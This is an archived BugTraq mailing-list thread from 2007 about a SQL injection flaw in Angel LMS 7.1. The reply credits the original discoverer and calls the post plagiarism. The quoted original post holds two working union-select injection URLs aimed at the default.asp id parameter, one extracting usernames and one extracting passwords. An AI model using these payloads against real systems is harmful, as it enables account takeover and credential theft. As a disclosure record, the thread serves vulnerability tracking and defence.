BugTraq
Angel LMS 7.1 - Remote SQL Injection Mar 01 2007 04:06PM
Guns inbox com (1 replies)
Re: Angel LMS 7.1 - Remote SQL Injection Mar 01 2007 05:33PM
str0ke (str0ke milw0rm com)
# Credit:
# Exploit discovered by Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com

http://www.milw0rm.com/exploits/3390

Plagiarism sucks.

/str0ke

On 1 Mar 2007 16:06:06 -0000, Guns (at) inbox (dot) com [email concealed] <Guns (at) inbox (dot) com [email concealed]> wrote:
> # Angel LMS 7.1 Remote SQL Injection
> # by Guns
>
> #All User Accounts#
> http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20usernam
e%20from%20accounts--"
>
> #Account Passwords#
> http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20passwor
d%20from%20accounts--"
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus